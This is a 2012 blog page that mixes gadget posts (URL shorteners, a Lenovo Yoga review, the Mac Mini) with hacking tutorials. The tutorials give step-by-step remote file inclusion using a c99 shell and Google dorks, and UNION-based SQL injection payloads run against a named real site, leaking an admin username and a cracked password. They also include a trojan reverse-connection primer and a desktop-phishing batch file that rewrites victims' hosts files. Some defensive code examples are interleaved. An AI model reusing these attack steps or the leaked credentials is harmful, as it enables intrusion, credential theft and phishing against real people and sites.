Monday, October 29, 2012

Shortest URL shortening service




URL shortening services make long website addresses (URLs) easy to remember and to reproduce from memory in text. The first URL shortening service dates back to 2002, and to date some thousand websites have been launched to offer people the advantages of a URL shortener.


While Twitter automatically shortens long URLs to leave room for more relevant words in posts, URL shortening services have had many downfalls in their 12-year career. Every shortened URL carries an alphanumeric code that is unique to the target site and redirects the visitor there. For example, shortening the URL ‘http://www.free-online-tv-shows.com’ in gg.gg generated the unique link ‘http://gg.gg/39r’. However, this does not mean that ‘http://gg.gg/39r’ will lead to the above website.


All shortened URLs must be registered before they can actually be used to direct users to certain web pages. Some forums block the posting of shortened URLs, and some short URLs may be classed as spam, because there are people who abuse these services for spamming. Reports indicate that 64% of the URL shortening services that have been introduced have shut down. Short URLs have also been used for malicious purposes such as child pornography, which has led to the closure of services. Some short URLs might lie unused, or the service provider might not be able to deliver long-term service, which results in ‘linkrot’: the link, and the chain of links that depend on it, stops working.


The services of gg.gg are yet to be tapped to their fullest potential with their URL shortener Chrome plugin.

Saturday, October 27, 2012

Lenovo IdeaPad Yoga 13 hands on: Flexible laptop for flexible Windows 8


Lenovo caught the attention of a lot of folks with the introduction of the Yoga laptop for Windows 8. The Yoga is a full laptop that has a screen you can flip all the way behind the base, turning it into a touch tablet. The Yoga 13 runs full Windows 8 and not the tablet-oriented Windows RT.


See related: Windows 8 hardware: x86 tablets and hybrids


Using the Yoga is hard to describe, as it can function as a standard Windows laptop with a large touch screen. It couples a great keyboard and trackpad with the Windows 8 touch screen elements to yield a unique user experience.






I spent the first few hours with the Yoga strictly in laptop mode. I wanted to get a feel for how well it worked as a laptop, as I suspect most buyers will end up using it this way. As a laptop the Yoga is a typical Lenovo offering, with good build quality and excellent hardware components.


Hardware specifications as reviewed:
Processor: Intel Core i5 1.7 GHz
Memory: 4 GB
Display: 13-inch IPS, 1600 x 900, 10-point multitouch
OS: Windows 8
Storage: 128 GB SSD
Camera: 1 MP webcam
Ports: 1-USB 3.0, 1-USB 2.0, audio combo, HDMI, 1-in-1 SD/MMC card reader
Connectivity: Wi-Fi b/g/n, Bluetooth
Battery: 8 hours
Dimensions: 333.4 x 224.8 x 16.9 mm (13.1 x 8.9 x 0.67")
Weight: 1.5 kg (3.3 lb)


Yoga 13 as a laptop


The Yoga 13 is an outstanding Ultrabook with the attention to detail Lenovo is famous for. The keyboard and large buttonless trackpad are quite good and coupled with the bright, vivid screen turn the Yoga into a great laptop.


The build quality of the device is quite good. It feels very solid yet very light. The special hinge on the display is very durable and allows flipping the lid all the way behind the keyboard base for use as a tablet. The keyboard is turned off when used as a tablet, a good thing as you actually push keys when holding the tablet.


Lenovo is quoting 8 hours of battery life and this feels accurate based on my limited use. The power cord has the special Lenovo connector used on recent laptops, roughly the size of a USB connector.


I am having some trouble with the trackpad, which otherwise is very sensitive and works mostly as expected. It took some deep digging to find the two-finger scrolling option for the trackpad, but once I enabled it I was a happy camper. I do find that in Windows 8 the individual apps must support such scrolling.


The trackpad is also prone to accidental activation when my hands are typing. There isn't an easy way to turn the trackpad off when typing which would make things much easier.


Yoga as tablet






To take advantage of the dual nature of Windows 8, the Yoga 13 can be turned into a full tablet. The screen is flipped all the way back behind the keyboard which deactivates the keyboard. It is disconcerting to constantly mash the keys when gripping the Yoga as a tablet, and I can't help feeling it will eventually break the keys.


As a tablet the Yoga 13 is not quite as good as it is as a laptop. This is due to the sheer size of the device, which is too heavy to hold in the hands for very long. It is a good touch tablet, just really big with that 13-inch screen.


The resolution of 1600 x 900 makes it really narrow in portrait mode, so I end up using it mostly in landscape. This makes it a pretty unwieldy tablet.


I also find that the edge swipe gestures used to invoke the Windows 8 charms, activate app settings, and switch among running apps are hard to perform. They rarely work with the first swipe, requiring a second attempt to execute the desired action. It is also common to accidentally execute an action on whatever tile is near the edge of the screen when trying to do a swipe gesture. This results in lots of apps running I don't want.


Yoga as hybrid






The ability to flip the display all the way behind the base adds the benefit of also moving the display anywhere in between closed and full tablet mode. This hybrid mode is touted by Lenovo as allowing propping up the unit like a tent for watching video or using in presentation mode. The Yoga 13 works well in either mode, although it's not likely to be used often in such modes.


The schizophrenic nature of the Yoga 13 goes hand in hand with the schizo nature of Windows 8. As a full version of Windows 8, legacy apps can be installed and run as desired. This is a powerful augmentation of the standard Metro desktop.


I find the new style Metro apps to be quite good, and the Yoga 13 runs them well on the large display. It is possible to also snap two apps side-by-side in Windows 8, a feature the wide display of the Yoga performs to advantage. I try to keep in Metro mode all the time, but Windows 8 makes this hard to do.


You never know when you tap a tile in Windows 8 if it is going to run in the preferred Metro mode or if you're going to get kicked into the desktop mode. It is jarring when that happens, as the windowed environment on such a high-resolution screen results in constant windows adjustment and font size increasing. Everything on the desktop is just so darn small on this great screen. It's like going from a modern operating environment (Metro) to an old-school Windows 7 desktop randomly.


Conclusion


The Yoga 13 is available now from Lenovo starting at $999. It is a great laptop with a unique bending screen that can be used in a number of positions for different functions. It's a large touch tablet that can be used much the same as any tablet, yet one that runs all Windows apps.


This laptop is primarily for those who need a laptop most of the time, with light duty as a tablet. The touchscreen works well in the laptop mode due to the Metro interface in Windows 8.

New Apple Mac Mini desktop computer is easy to repair, upgrade, says iFixit

Apple haters love to point to iFixit's teardowns of its recent products as a sign of the company's consumer unfriendliness. For instance, the site just failed the new MacBook Pro 13-inch with Retina Display on its repairability, scoring it a mere 2 out of 10. Conspiracy theories abound that Apple makes it difficult to repair and upgrade its products in order to make consumers buy new models instead of trying to fix their existing ones.


They'll have to hold their tongues about the new Mac Mini, however. According to iFixit's teardown of the tiny computer, Apple has actually made a device that is surprisingly easy to repair and upgrade. In fact, it gives the Mac Mini circa 2012 an 8 out of 10 on its repairability scale.


How did that happen? For starters, Apple makes it simple to open up the Mac Mini: just twist off the disc-shaped back panel to access its components. It also makes it easy to upgrade the system's RAM, as it uses PC3-12800 DDR3 RAM; in comparison, the new MacBook Pro has its RAM soldered to the logic board, meaning there's no option to replace or upgrade.


iFixit also gives Apple props for an easily repairable power supply, and it was successful in installing its own $69.95 Mac Mini Dual Hard Drive Kit without hiccups. The new Mac Mini lacks some of the other bugaboos that have made other recent Apple products difficult to upgrade and repair, like proprietary screws and numerous parts that are glued together.


Not everything is perfect, however. One part that is soldered on is the CPU, so you can't really replace it with a new processor in the future. And even if it's not hard to replace the power supply, you have to excavate it from a mountain of parts first. Still, I have a feeling the Mac Mini will easily top the score for the new iMac, whenever iFixit gets around to tearing that down.

Thursday, October 18, 2012

Remote File Inclusion (RFI) | Website Hacking


Before starting this tutorial, I would like to tell you about a piece of code called a shell. There are many shells available. Let's consider a shell known as the c99 shell. First download it from here.
Now sign up for an account on any free web hosting site, say 110mb.com. Now sign into your account, go to File Manager, upload some files and then upload the c99 shell there. Now just log out and visit the URL of the shell you uploaded.

http://username.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging into your account, that is, without entering your password anywhere.

Both images show the file manager: in the first I am accessing it by signing into my account, and in the second just by accessing the shell without logging in.
                                 




I just wanted to show you how deadly it can be if anybody somehow uploads this kind of shell onto your server. This is where the concept of Remote File Inclusion comes into the picture.




Note: Your account might be suspended after uploading such shells.


What is Remote File Inclusion ?

As is clear from the name, Remote File Inclusion means 'including a remote file'. RFI is a vulnerability found in websites that allows attackers to include a remote file on the web server. This may lead to remote code execution and complete compromise of the system.

How to perform attack ?

Step 1. Upload a shell in text format on your web hosting site. That is, just copy the code of the shell, save it as a text file and upload it. Note down the complete path of your shell.
Step 2. Search for vulnerable sites using Google dorks, like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step 3. Let's say you got a site like
http://www.victim.com/index.php?page=anything

Replace this URL with http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

If the victim's site is vulnerable, your shell will have been included on the server. Now you can do anything with the victim's site, or maybe even with other sites running on the same web server, simply by accessing your shell.
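As an added example from the defender's side (my own code, not taken from the post or from any project it names), here is what closes the ?page= hole described above and how to spot attempts at it in logs. The dispatcher treats the parameter as a lookup key into an allow-list and refuses anything carrying a URL scheme or path separators, and the scanner flags access-log lines whose query values have the same shape. It is written in Python rather than PHP so it runs as a stand-alone demonstration; the allow-list and log lines are constructed, with addresses from the documentation range.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed allow-list: the only values a ?page= dispatcher should ever accept.
# The parameter is a lookup key, never a path or URL supplied by the client.
ALLOWED_PAGES = {
    "home": "pages/home.html",
    "about": "pages/about.html",
    "news": "pages/news.html",
}

def resolve_page(page_param):
    """Map a ?page= value to a local file, or return None when it must be refused."""
    if not isinstance(page_param, str) or not page_param:
        return None
    # Any scheme ('http://', 'ftp://', 'php://' ...) means a remote or stream include attempt.
    if urlparse(page_param).scheme:
        return None
    # Path separators, traversal and NUL bytes never belong in a page key.
    if any(bad in page_param for bad in ("/", "\\", "..", "\0")):
        return None
    return ALLOWED_PAGES.get(page_param)   # unknown keys fall through to None

# Detection side: scan access-log lines for query values that look like include abuse.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_param_values(request_target):
    """Return (name, value) pairs from the query string that resolve_page would refuse."""
    query = urlparse(request_target).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if urlparse(value).scheme or any(bad in value for bad in ("/", "\\", "..")):
                hits.append((name, value))
    return hits

def flag_include_attempts(log_lines):
    """Return (client_ip, hits) for every log line carrying a suspicious query value."""
    flagged = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_param_values(match.group(1))
        if hits:
            flagged.append((line.split()[0], hits))
    return flagged

# Constructed access-log lines in common log format (client addresses are from 203.0.113.0/24).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/Oct/2012:10:01:09 +0000] "GET /index.php?page=http://example.net/yourshell.txt? HTTP/1.1" 200 4096',
    '203.0.113.9 - - [18/Oct/2012:10:02:15 +0000] "GET /index.php?page=../../config.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(resolve_page("about"), resolve_page("http://example.net/yourshell.txt?"))
    for ip, hits in flag_include_attempts(SAMPLE_LOG):
        print(ip, hits)
```

The allow-list is the real fix: once the client can only choose among fixed keys, there is nothing left to include remotely. On a PHP host the `allow_url_include=Off` setting (the default in current PHP releases) is the belt-and-braces layer that stops `include` from fetching URLs at all, but it does not help against local files, which is why the key lookup matters more than the blocklist of bad substrings.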

SQL Injection


What is SQL injection ?
SQL stands for Structured Query Language. It is a very high-level language, I mean close to humans. Queries like SELECT, INSERT, DELETE and UPDATE are used to select, add, delete and update data respectively. SQL is used to design databases, and the information is stored in databases.
SQL injection is a vulnerability occurring in the database layer of an application which allows an attacker to see the contents stored in the database. This vulnerability occurs when the user's input is not filtered or is improperly filtered. For example, take web page links in the format
www.anything.com/something.php?something=something, for example
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to the database and it returns the results accordingly. Let's attach a single quote (') at the end, that is
www.tartanarmy.com/news/news.php?id=130'
and we get an error on the screen because the single quote (') was included while processing the results. This assures us that it didn't filter our input and is vulnerable to attack.

Some basics:-
Every database server has databases on it. Every database has tables in it, tables have columns in them, and finally the data is stored in the columns.



  


We have chosen the database "explore_hacking" from six databases. It has four tables: admin, articles, products and subscribers. Each table has further columns and data stored in them. For example, we chose the 'admin' table; it has the columns id, username, password and email.

What is information_schema ?
It is an information database present in all SQL database servers (version > 5) by default. It contains information like the names of the tables and columns present in all other databases.

We have opened the database "information_schema", which is present by default, and the table named "TABLES" in that database.





SQL Injection Tutorial :-
This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send queries through the URL to get results back on screen accordingly. The motive is to get the name of the table and the names of the columns in which usernames and passwords are stored, and finally to fetch them. Instead of copying and pasting the long links, simply click on "click here" and open in a new tab.

Step 1. Find the number of columns.
Let's use the "ORDER BY" clause here; it is used to sort by a column. Choose any number, say 10. Here I have assumed that the number of columns can't be more than 10. "--" makes anything after it a comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it to sort the result by the 10th column. But it returned an error, which means the number of columns is less than 10. Let's replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9-- But again we got an error. This means the number of columns is less than 9. Like this we keep on going until we don't get an error.
Finally we reach 6:
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
We didn't get any error, which means there are 6 columns.

Step 2. Find vulnerable columns.
Now let's use the "UNION ALL" and "SELECT" commands. Remember to put a dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6-- Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.



Step 3. Find the database version.
Replace the most vulnerable column with "@@version" or "version()" (if the first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that the version is 5 point something, that is, greater than 5. We would have had to follow some other approach if the version were less than 5, because in versions below 5 there is no default database like "information_schema" which stores information about the tables and columns of the other databases.

Step 4. Finding table names.
Replace the vulnerable column number with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- Click here
We got the first table name on the screen.

To get all tables, use group_concat:
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here

Step 5. Finding column names.
Similarly, get all the columns by simply replacing 'table' with 'column':
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- Click here
There is a repeating element, in this case 'id'. From it we can tell which table has which columns.


Step 6. Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in the first table, that is tar_admin. "0x3a" is simply used to insert a colon into the result to separate the values; it is the hex code of a colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin-- Click Here

So finally we got the usernames and passwords on screen. But the passwords are encrypted. Mostly these encryptions are crackable. Let's choose any username, say "Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15. Let's log on to http://md5crack.com/crackmd5.php and put the hashed (encrypted) password there. And it will crack it for us. We got 'oorwullie' in the result (the password in clear text).
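To make the flaw behind news.php?id= concrete, here is an added Python/SQLite example (my own code, not the post's and not taken from the site it walks through) with a constructed database that borrows the tar_admin table name from the steps above. vulnerable_lookup pastes the parameter straight into the SQL text, so the ORDER BY probe, the stray quote and the UNION SELECT behave exactly as the tutorial describes; safe_lookup validates the type the page expects and binds the value as a parameter, so the same inputs are refused or match nothing. SQLite accepts the post's "union select all" spelling; on MySQL the canonical form is UNION ALL SELECT.

```python
import sqlite3

def build_demo_db():
    """Constructed stand-in for the site's database: a six-column news table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                           author TEXT, posted TEXT, views INTEGER);
        CREATE TABLE tar_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (130, 'Match report', 'constructed body text',
                                 'editor', '2012-10-18', 42);
        INSERT INTO tar_admin VALUES (1, 'alice', 'constructed-hash-placeholder');
    """)
    return conn

NEWS_COLUMNS = "id, title, body, author, posted, views"

def vulnerable_lookup(conn, id_param):
    """Mirrors news.php?id=: the raw parameter is concatenated into the SQL text."""
    sql = f"SELECT {NEWS_COLUMNS} FROM news WHERE id={id_param}"
    return conn.execute(sql).fetchall()

def query_errors(conn, id_param):
    """True when the database rejects the concatenated query (the 'error on screen' in the post)."""
    try:
        vulnerable_lookup(conn, id_param)
    except sqlite3.OperationalError:
        return True
    return False

def safe_lookup(conn, id_param):
    """Hardened form: validate the expected type, then bind the value instead of pasting it."""
    try:
        article_id = int(id_param)
    except (TypeError, ValueError):
        return []            # not an integer: refuse before the database ever sees it
    sql = f"SELECT {NEWS_COLUMNS} FROM news WHERE id=?"
    return conn.execute(sql, (article_id,)).fetchall()

if __name__ == "__main__":
    db = build_demo_db()
    probe = "-130 union select all 1,username,3,4,5,6 from tar_admin--"
    print("order by 10 errors:", query_errors(db, "130 order by 10--"))   # True: only 6 columns
    print("order by 6 errors: ", query_errors(db, "130 order by 6--"))    # False
    print("vulnerable:", vulnerable_lookup(db, probe))   # leaks the admin row
    print("safe:      ", safe_lookup(db, probe))         # []
```

Parameter binding alone is enough to stop the injection, because the bound value is never parsed as SQL; the int() check on top of it is cheap input validation that also turns the probing requests into something easy to log and alert on.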


Note: Hashes are a type of encryption which is irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes cannot be cracked.
Where is the login panel or login page of the website ?
So you got the key, where is the lock now? Most websites have their login pages at default locations. Take any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it will try all these default pages.

Windows Logon Password - How crackers work ?


Cracking the Windows logon password is not so difficult. You can get many offline password crackers which can either change/clear the existing password (like Offline NT Password & Registry Editor) or crack the existing password (like Ophcrack). Just download their ISO images, burn them, insert the CD into the CD-ROM drive and then things are simply self-explanatory. I am writing this post to make clear how these password crackers actually work.


Okay, when you set a Windows logon password, it is obviously stored in a file somewhere in Windows. The password is stored in the SAM file placed in %systemroot%\system32\config (like C:\windows\system32\config).
Now why don't we just try to open SAM and see all the stored passwords? Okay, let's do it: go to C:\windows\system32\config and open SAM. You get an error that "it is in use by another application". Actually we can't open the SAM file while Windows is running. And even if we somehow manage to access the contents of the SAM file, we won't get the passwords in clear text; they are encrypted.

So , what is SAM file ?

SAM stands for Security Accounts Manager. SAM is a database, stored as part of the Windows registry, that holds Windows users' passwords in hashed formats (LM and NTLM). These are usually called hashes.


What are hashes ?

Hashes are a kind of encryption. A hash function is a one-way function. One way means that if plain text is converted into a hash, it cannot be converted back to plain text. Remember, this is the most important point: they are one-way functions.

What is windows authentication procedure ?

Whenever a user creates a new account in Windows, its password is converted to a hash and stored in the SAM database. When the user logs in, the entered password is converted to a hash and compared with the stored hash in the SAM database; if both hashes match, the user is authenticated.

How to access SAM file ?

The SAM file cannot be moved, copied or opened while Windows is running. It can be accessed only when Windows is offline/not running. Confused about how we can use Windows files when Windows is not running?
Here comes the concept of live operating systems. A live CD contains a bootable OS. Just insert it in the CD-ROM drive and you can use it without any installation.

How to crack Windows password ?

Okay, suppose we have got access to the SAM file and have the password hashes. Don't you think it's useless, because hashes can't be converted back to plain text? Let's see what we can do.

We (I mean automated tools) can actually do two things.

1. Clear/change the password: clear the existing hash and put in a new hash (we know the algorithm to convert plain text to a hash) in order to change/clear the password. This is how Offline NT Password & Registry Editor works. It doesn't give you the original password but helps you to change/clear it.
2. Crack the password: make a long list of all possible combinations of letters and numbers and convert them to hashes. Compare every hash with the hash we obtained from the SAM file and the hashes can be cracked. This is exactly how Ophcrack works. It has already saved the hashes of many possible combinations of letters/numbers, stored in tables called rainbow tables.
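An added example, not from the original post, of the two properties the post leans on: a hash is one-way, yet an unsalted hash of a common password can be recognised from a table computed in advance, which is exactly why rainbow tables work against NT hashes (unsalted MD4 of the UTF-16LE password). The tiny "table", the password list and the captured digest are all constructed. The defender-side functions show the countermeasure: a random per-user salt plus a slow key-derivation function (PBKDF2-HMAC-SHA256) makes any precomputed table useless, because two users with the same password no longer share a digest.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a rainbow table: unsalted digests of a few guessed passwords,
# computed once and reused against every hash that is ever captured.
COMMON_PASSWORDS = ["password", "123456", "letmein", "qwerty"]

def unsalted_hash(password):
    """Unsalted MD5, used here only to model a salt-free one-way scheme such as NT hashes."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

PRECOMPUTED = {unsalted_hash(p): p for p in COMMON_PASSWORDS}

def lookup_precomputed(digest_hex):
    """Table lookup: the hash is not reversed, a digest seen before is merely recognised."""
    return PRECOMPUTED.get(digest_hex)

ITERATIONS = 100_000   # work factor; raise it as hardware gets faster

def store_password(password, salt=None):
    """Defender side: random per-user salt plus a slow KDF. Returns (salt, digest) to store."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, stored_digest):
    """Recompute with the stored salt and compare in constant time (same idea as the SAM check)."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored_digest)

def same_password_same_digest(password):
    """True when two users with the same password would end up with identical stored digests."""
    _, first = store_password(password)
    _, second = store_password(password)
    return first == second

if __name__ == "__main__":
    captured = unsalted_hash("letmein")            # constructed 'captured' unsalted hash
    print("unsalted table lookup:", lookup_precomputed(captured))
    salt, digest = store_password("letmein")
    print("salted verify:", verify_password("letmein", salt, digest))
    print("salted digest in table:", lookup_precomputed(digest.hex()))
    print("two users, same password, same digest?", same_password_same_digest("letmein"))
```

The point for defenders is that the one-way property on its own is not protection when the input space is small and the scheme is unsalted; salting forces the attacker to redo the work per user, and the iteration count makes each unit of that work expensive.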

Trojan Horse (Basics) - Part 1


Have you watched the movie Troy? Okay, let's leave that. Has your wallpaper ever changed automatically? Have programs ever started without your initiating them? Has the browser opened unexpected websites automatically? Simply, have you ever felt that someone else is controlling your computer? No?
Congrats, you probably haven't been a victim of a trojan yet :).

A trojan horse is a remote administration tool (RAT). This is something extremely dangerous. A trojan gives full control of the victim's PC to the attacker.
A trojan has two parts. One is the client part (control panel) and the other is the server part (meant to be sent to the victim).

The basic methodology of using a trojan is as follows:-

1. The attacker creates a small executable file (a few KB in size). This is the server part of the trojan and is mostly called server.exe.

2. The attacker might hide this server.exe behind a genuine-looking file like a song or an image. The attacker gives this file to the victim, who is supposed to double-click on it.

3. When the victim runs the server part, a port on the victim's computer gets opened and the attacker can control the PC remotely from any part of the world through the control panel (client part). The attacker can do anything with the victim's computer remotely that the victim himself can do on it.

Note: From here on I am assuming that you know a little bit about IP addresses, that is, LAN/internal/private and WAN/external/public IPs.
Two different methods of working of a trojan.

1. Direct connection: In this method, after the server part has been installed on the victim's machine, the attacker enters the public IP address assigned to the victim's computer to make a connection to it. But the limitation of a direct connection is that the public IP address is most probably dynamic and changes every time one disconnects and reconnects, so the attacker needs to find out the victim's IP address each time. Moreover, an incoming connection like this is usually restricted by the firewall.
The main limitation of a direct connection is that you cannot reach a victim who is behind a router or a network, because the victim's machine is not assigned a public/external/WAN IP. It is only assigned a private/internal/LAN IP, which is useless or meaningless for computers outside that network. The WAN IP belongs to the router.

It doesn't matter how the attacker is connected to the internet. The attacker can be connected to the internet by any of three means.




The victim is behind a router in this case. (I haven't inserted the picture of the victim behind a network; imagine it.)
2. Reverse connection: In this method, the attacker enters his own IP address in the server part while configuring it. So when the server part is installed on the victim's computer, it automatically makes a connection to the client part, that is, the attacker. Also, the firewall on the victim's machine does not restrict outgoing connections. The problem in this case is the same: the attacker's IP is also dynamic. But this can be overcome easily: the attacker actually enters a domain name in the server part which always points to his dynamic IP.

A reverse connection can bypass a router or a network.


You might be confused at this point. Kindly mention your queries/doubts in the comments.


Note: This was just a basic theoretical guide to trojans. Read Part 2, containing the configuration and step-by-step use of trojans, here.

Desktop Phishing - Step by step tutorial


It is an advanced form of phishing. Kindly read my previous post on normal phishing here before proceeding. The difference between phishing and desktop phishing is as follows.

In phishing :-

1. The attacker convinces the victim to click on the link to a fake login page which resembles the genuine login page.

2. The victim enters his credentials in the fake login page, and they go to the attacker.
3. The victim is then redirected to an error page or to the genuine website, depending on the attacker.

But the main drawback of phishing is that the victim can easily tell the fake login page from the real one by looking at the domain name. Desktop phishing overcomes this by spoofing the domain name.

In desktop phishing:-
1. The attacker sends an executable/batch file to the victim, and the victim is supposed to double-click on it. The attacker's job is done.
2. The victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn't notice.
3. The rest is the same as in normal phishing.


What is Hosts File ?

The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com, a query is sent to a Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for an IP address associated with the domain name.

Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query to resolve the IP address of www.anywebsite.com would be sent to DNS.

What is the attack ?
I hope you have got an idea of how modifying this hosts file on the victim's computer can be misused. We need to modify the victim's hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he will be directed to our fake login page, and the domain name in the URL box will remain genuine as typed by the victim. Hence the domain name is spoofed.

Two steps to perform the attack :-
1. Create and host the phishing page on your computer.
2. Modify the victim's hosts file

Step 1 -:

Web hosting sites like 110mb.com, ripway.com etc., where we usually upload our phishing page, do not provide an IP that points to your website like www.anything.110mb.com, because an IP address points to a web server and not to a website. So we need to host the phishing page on our own computer using web server software like WAMP or XAMPP.
Kindly read my simple tutorial on setting up the XAMPP web server here and this step will be clear to you.

Step 2. This step can be performed in two different ways.

Method 1 - Send the victim a zip file containing the modified hosts file. When the zip file is opened, it automatically replaces the victim's original hosts file with the modified one.

Copy your hosts file and paste it anywhere. Modify it to suit yourself: edit it with any text editor and associate your public IP address with the domain you wish, as shown.

Like in this case, when the victim visits gmail.com, he will be taken to the website hosted on the IP 'xxx.xxx.xxx.xxx'. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location C:\Windows\system32\drivers\etc and the victim's hosts file is replaced by our modified hosts file.






Then you can bind this file with any exe (using a binder) or directly give it to the victim. He is supposed to click it, and you are done.

Method 2 - Create a batch file which modifies the hosts file as per your need.
Open Notepad and type the following text:

echo xxx.xxx.xxx.xxx www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
Obviously replace these with your IP and website according to yourself.

Save the file as 'All Files' instead of text files and name it anything.bat. The extension must be .bat.
When the victim runs this file, new entries are appended to the hosts file.

You can test both of the above methods by modifying your own hosts file.

Limitations of the attack :-
1. Our public IP address is most probably dynamic, that is, it changes every time we disconnect and reconnect. To overcome this we need to purchase a static IP from our ISP.
2. The browser may warn the victim that the digital certificate of the website is not genuine.

Countermeasures:-
Never blindly enter your credentials in a login page, even if you yourself typed the domain name in the web browser. Check whether the protocol is "http" or "https". https is secure
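From the defender's side, the hosts-file trick described above leaves a very visible artefact: a routable address mapped to a well-known hostname in a file that normally holds nothing but loopback entries. As an added example (my own code, not from the original post), this Python auditor parses hosts-file text and flags every entry whose address is neither loopback nor the 0.0.0.0 null route used by ad blockers. The sample content is constructed; the 115.125.124.50 and xxx.xxx.xxx.xxx lines mirror the post's own illustrations, and the Windows path is the one the post gives.

```python
import ipaddress
import platform

# Where the file lives: the Windows path is the one given in the post.
HOSTS_PATH = (r"C:\Windows\System32\drivers\etc\hosts"
              if platform.system() == "Windows" else "/etc/hosts")

# Constructed hosts-file content. The 115.125.124.50 line is the kind of entry the post
# describes; the xxx placeholder is what the post's batch file would append verbatim.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.invalid       # blocklist-style null route, harmless
115.125.124.50  www.anywebsite.com anywebsite.com
xxx.xxx.xxx.xxx www.watever.com
"""

def parse_hosts(text):
    """Return (line_number, address, [hostnames]) for each active entry, skipping comments."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop trailing comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                             # malformed: no hostname after the address
        entries.append((lineno, fields[0], fields[1:]))
    return entries

def suspicious_entries(text):
    """Flag entries that override name resolution with anything but loopback or a null route."""
    flagged = []
    for lineno, addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            flagged.append((lineno, addr, names, "address does not parse"))
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue
        flagged.append((lineno, addr, names, "routable override of DNS"))
    return flagged

def audit_file(path=HOSTS_PATH):
    """Run the same check over the live hosts file on this machine."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())

if __name__ == "__main__":
    for lineno, addr, names, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {lineno}: {addr} -> {', '.join(names)} ({reason})")
```

Legitimate developer overrides pointing at private addresses will be flagged too; that is the right default for a check like this, since a redirect of a public login domain is exactly what the post's batch file produces, and a reviewer can exempt known internal entries (for example with ip.is_private) once they have been looked at.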